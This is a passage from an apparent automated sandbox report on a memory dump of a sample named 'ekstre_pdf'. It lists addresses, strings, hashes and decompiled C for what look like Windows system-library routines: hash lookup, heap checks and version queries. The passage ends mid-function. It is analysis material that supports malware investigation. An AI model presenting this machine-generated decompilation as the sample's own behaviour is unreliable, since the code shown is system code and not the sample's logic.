0x340851d2
0x340851d7
0x340851d9
0x340851dc
0x340851dc
0x340851e1
0x340cb9e5
0x340cb9e7
0x340cb9ec
0x00000000
0x340851e7
0x340851ec
0x340851f1
0x340851f4
0x34085204
0x34085207
0x3408520a
0x340cb9f4
0x340cb9f7
0x340cb9f9
0x340cb9fc
0x340cba04
0x340cba18
0x340cba1a
0x340cba1a
0x340cba21
0x340cba28
0x340cba2b
0x340cba2c
0x340cba30
0x340cba33
0x340cba33
0x34085210
0x34085213
0x34085218
0x3408521f
0x34085233
0x340cba3b
0x340cba3b
0x34085233
0x3408523b
0x3408524a
0x3408524f
0x34085252
0x34085252
0x34085255
0x3408525a
0x34085267
0x34085267
0x3408526c
0x00000000
0x3408526c

Strings

WindowsExcludedProcs, xrefs: 3408514A
Kernel-MUI-Language-Allowed, xrefs: 3408519B
Kernel-MUI-Number-Allowed, xrefs: 34085167
Kernel-MUI-Language-SKU, xrefs: 3408534B
Kernel-MUI-Language-Disallowed, xrefs: 34085272

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 717a4ea943ddb16231dd75c98af8c6b7f4236524237d96ab6892f4ef1b5d8b9b
Instruction ID: 99e48a987c68858c358c3a8deb1a200412c6374382143110cf0ed3fb0013dc5f
Opcode Fuzzy Hash: 717a4ea943ddb16231dd75c98af8c6b7f4236524237d96ab6892f4ef1b5d8b9b
Instruction Fuzzy Hash: DCF11E76E41219EFDB51CFE4DA80ADEBBF8FF48654F50409AE501A7210EB749E01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 3413ACEB Relevance: 6.4, APIs: 4, Instructions: 450
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E3413ACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x3413abd2
						_v24 = _t12;
						_t149 = L340653C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x3413abd2
									E340652F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x341591e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L34072330(E340A88C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x3413abd2
																E340724D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x341591e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E34094CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x341591e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x341591e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E3413AC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E3413ACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E3413AC6F(_t31) == 0) {
									_t364 = 0;
								}
								E340652F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E3413ACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}

0x3413acf4
0x3413acf6
0x3413acfb
0x3413acfe
0x3413ad05
0x3413ad05
0x3413ad08
0x3413ad0e
0x3413ad6f
0x3413ad6f
0x3413ad72
0x3413adc8
0x3413adce
0x3413add0
0x3413add0
0x3413add3
0x3413add7
0x3413adda
0x3413addf
0x3413ade1
0x3413ade1
0x3413ade1
0x3413ade1
0x3413adec
0x3413adf0
0x3413adf2
0x3413adf5
0x3413adf8
0x3413adfd
0x00000000
0x00000000
0x3413adff
0x3413ae04
0x3413ae69
0x3413ae6b
0x3413ae6d
0x3413ae8b
0x3413ae8b
0x3413ae8f
0x3413ae97
0x3413ae9a
0x3413aea9
0x3413aeb1
0x3413aeb3
0x3413aeb8
0x3413aec8
0x3413aec9
0x3413aeca
0x3413aed6
0x3413aedb
0x3413aede
0x3413aeea
0x3413aef9
0x3413aefe
0x3413af01
0x3413af03
0x3413af03
0x3413af03
0x3413af0e
0x3413af12
0x3413af15
0x3413af17
0x3413af1a
0x3413af1f
0x3413af5b
0x3413af5b
0x3413af5e
0x3413af5e
0x3413af66
0x00000000
0x00000000
0x3413af6f
0x3413af75
0x3413af77
0x3413afae
0x3413afae
0x3413afb0
0x3413afb3
0x3413afb3
0x3413afb6
0x3413afb6
0x3413afb9
0x3413afbc
0x3413afbf
0x3413afc4
0x3413afcc
0x3413b11b
0x3413b128
0x3413b12d
0x3413b12f
0x3413b132
0x3413b135
0x3413b15e
0x3413b160
0x3413b160
0x3413b166
0x3413b168
0x3413b16b
0x3413b16d
0x3413b16f
0x3413b16f
0x3413b173
0x3413b17a
0x3413b17c
0x3413b180
0x3413b185
0x3413b18b
0x3413b18b
0x3413b18d
0x3413b193
0x3413b193
0x3413afd4
0x3413afdc
0x3413afe3
0x00000000
0x00000000
0x3413afe9
0x3413afef
0x3413aff3
0x3413aff3
0x3413afff
0x3413b005
0x3413b007
0x3413b009
0x3413b00e
0x3413b194
0x3413b194
0x3413b19a
0x00000000
0x00000000
0x3413b1a0
0x3413b1a3
0x00000000
0x3413b014
0x3413b014
0x3413b014
0x3413b019
0x3413b02c
0x3413b033
0x3413b035
0x3413b035
0x3413b03a
0x3413b03c
0x3413b049
0x3413b052
0x3413b056
0x3413b058
0x3413b067
0x3413b067
0x3413b070
0x3413b07b
0x3413b07e
0x3413b0ec
0x3413b0ec
0x3413b0ec
0x3413b0f2
0x3413b0f5
0x3413b0fb
0x3413b0fe
0x3413b100
0x3413b105
0x3413b110
0x3413b116
0x3413b118
0x3413b118
0x3413b118
0x00000000
0x00000000
0x00000000
0x00000000
0x3413b080
0x3413b080
0x3413b080
0x3413b080
0x3413b083
0x3413b086
0x3413b086
0x3413b089
0x3413b092
0x00000000
0x00000000
0x3413b096
0x3413b09c
0x3413b0a7
0x3413b0b0
0x3413b0ca
0x3413b0cc
0x3413b0d2
0x3413b0d6
0x3413b0d9
0x3413b0d9
0x3413b0de
0x3413b0de
0x3413b0e1
0x3413b0e2
0x3413b0e8
0x00000000
0x3413b05a
0x3413b05a
0x3413b05d
0x3413b05d
0x3413b05e
0x3413b060
0x3413b063
0x00000000
0x3413b05d
0x3413b058
0x3413b01b
0x3413b020
0x3413b027
0x3413b02a
0x00000000
0x00000000
0x00000000
0x00000000
0x3413b022
0x3413b022
0x3413b022
0x3413b023
0x3413b023
0x00000000
0x3413b022
0x3413b00e
0x00000000
0x3413af77
0x3413af71
0x3413af73
0x00000000
0x3413af73
0x3413af21
0x3413af26
0x3413af8c
0x3413af8e
0x3413af90
0x00000000
0x00000000
0x3413af92
0x3413af95
0x3413af9a
0x3413af9c
0x3413afa1
0x3413afa7
0x3413afa7
0x00000000
0x3413afa1
0x3413af4d
0x3413af52
0x3413af55
0x3413af58
0x00000000
0x3413af79
0x3413af7d
0x3413af82
0x00000000
0x3413af8a
0x3413aeba
0x00000000
0x3413aeba
0x3413ae6f
0x3413ae6f
0x3413ae79
0x3413ae7b
0x3413ae7b
0x3413ae81
0x00000000
0x3413ae81
0x3413ae2b
0x3413ae30
0x3413ae33
0x3413ae36
0x3413ae39
0x3413ae39
0x3413ae3c
0x3413ae3c
0x3413ae44
0x00000000
0x00000000
0x3413ae4d
0x3413ae53
0x3413ae55
0x00000000
0x00000000
0x3413ae5b
0x3413ae62
0x00000000
0x00000000
0x00000000
0x3413ae64
0x3413ae4f
0x3413ae51
0x00000000
0x3413ae51
0x3413ade1
0x3413ad74
0x3413ad77
0x3413adbf
0x3413adc5
0x3413adc7
0x00000000
0x3413adc7
0x3413ad79
0x3413ad7c
0x3413adb6
0x3413adbc
0x3413adbe
0x00000000
0x3413adbe
0x3413ad7e
0x3413ad81
0x3413adad
0x3413adb3
0x3413adb5
0x00000000
0x3413adb5
0x3413ad83
0x3413ad86
0x3413ada4
0x3413adaa
0x3413adac
0x00000000
0x3413adac
0x3413ad88
0x3413ad8b
0x3413ad9b
0x3413ada1
0x3413ada3
0x00000000
0x3413ada3
0x3413ad90
0x00000000
0x3413ad92
0x3413ad98
0x3413ad9a
0x00000000
0x3413ad9a
0x3413ad10
0x3413ad12
0x3413ad18
0x3413ad1a
0x3413ad54
0x3413ad59
0x3413ad5f
0x3413ad63
0x3413ad68
0x3413ad6a
0x3413ad6a
0x00000000
0x3413ad1a

APIs

RtlDebugPrintTimes.NTDLL ref: 3413AEA9
RtlDebugPrintTimes.NTDLL ref: 3413B185

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 577754be498b9d594a05fb85f80fc72d32436a22fe74c5cb2034662f603b6923
Instruction ID: cc842ecd23d735712b74c2c4b4a8a77a0a05b05a7da8df62b9de250dc216dc96
Opcode Fuzzy Hash: 577754be498b9d594a05fb85f80fc72d32436a22fe74c5cb2034662f603b6923
Instruction Fuzzy Hash: B7F1E476F00A118FDB08CF68C9E067EBBF6EF88250B5A41ADD456DB285E734E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 34057662 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E34057662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3405B910();
					} else {
						E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3405B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E3405B910(", passed to %s", _t29);
					}
					_push("\n");
					E3405B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x341547a1 = 1;
						asm("int3");
						 *0x341547a1 = 0;
					}
					return 0;
				}
				return 1;
			}

0x34057667
0x34057669
0x34057672
0x340bad93
0x340badb2
0x340badb7
0x340bad95
0x340badaa
0x340badaf
0x340badc3
0x340badcc
0x340badd4
0x340badda
0x340baddb
0x340bade0
0x340badf0
0x340badf2
0x340badf9
0x340badfa
0x340badfa
0x00000000
0x340bae01
0x00000000

Strings

, passed to %s, xrefs: 340BADCF
HEAP[%wZ]: , xrefs: 340BADA5
HEAP: , xrefs: 340BADB2
Invalid heap signature for heap at %p, xrefs: 340BADBE
RtlFreeHeap, xrefs: 340BADCE

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: df268790f7d12545ac24bd946e12eaa5f45510043f3b3adba991f2d4c3d09a0e
Instruction ID: 908f7998be89cd8c22f100361a8c6c145b756910938ba7e2c34af8fa69f34c96
Opcode Fuzzy Hash: df268790f7d12545ac24bd946e12eaa5f45510043f3b3adba991f2d4c3d09a0e
Instruction Fuzzy Hash: F1017036309140EFF305836DD508F867FF8EB42734F1544DEE040575A1CAA5E840EE64

Uniqueness

Uniqueness Score: -1.00%

Function 34060485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E34060485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x34156630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E340682E0(0xabababab, 0, "kLsE", 0);
					 *0x34156630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E34085C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E34060670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E34060670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E34060630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E340A5050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E340A3EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E34060690) {
					 *0x341591e0();
					_t50 =  *_t73();
				} else {
					_t50 = E34060690();
				}
				_t84 = _t50;
				goto L4;
			}

0x3406048f
0x34060493
0x3406049a
0x340604a0
0x340604a3
0x340604a6
0x340604af
0x340604b8
0x340604c2
0x340604cb
0x340604ce
0x340604d2
0x340604d6
0x3406060e
0x34060610
0x34060618
0x00000000
0x00000000
0x340604ef
0x340604ef
0x340604f2
0x340605e3
0x340605ea
0x340605f1
0x340605f1
0x34060501
0x34060501
0x34060504
0x3406050c
0x34060519
0x3406051b
0x00000000
0x340be99c
0x340be9a2
0x340be9ac
0x3406051f
0x3406052a
0x340be9b9
0x340605cd
0x340605d3
0x340605d3
0x340be9bf
0x3406053c
0x3406054d
0x34060559
0x34060562
0x340be9ce
0x340be9ce
0x3406056a
0x3406057b
0x34060580
0x34060580
0x3406058f
0x34060597
0x34060598
0x3406059d
0x340605a1
0x340605a5
0x340605ad
0x340605b3
0x340be9dd
0x00000000
0x340be9ed
0x00000000
0x340be9ed
0x340be9dd
0x340605b9
0x340605be
0x340605c7
0x340be9f2
0x340be9f2
0x340605c7
0x00000000
0x340605ad
0x00000000
0x340be9b2
0x3406050c
0x340604fb
0x340be989
0x340be990
0x00000000
0x340be990
0x00000000
0x340604fb
0x340604dc
0x340604e2
0x340605d6
0x340605dc
0x340604e8
0x340604e8
0x340604e8
0x340604ed
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 340605D6

Strings

kLsE, xrefs: 340605FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34060586

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 18763e7b86cc7e7e73cccc40e99bae92b73dd8cefb709b7d88718ffc84e03b2e
Instruction ID: 9cc6c729abc11c95d4451672a6b537e2f008d69f9f43d8bda94c9ad8b5df3fb6
Opcode Fuzzy Hash: 18763e7b86cc7e7e73cccc40e99bae92b73dd8cefb709b7d88718ffc84e03b2e
Instruction Fuzzy Hash: D551A0B5B40706DFEB14EFA4C6406ABB7E9EF45308F0084BED59793240E7789505CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3409265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E3409265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
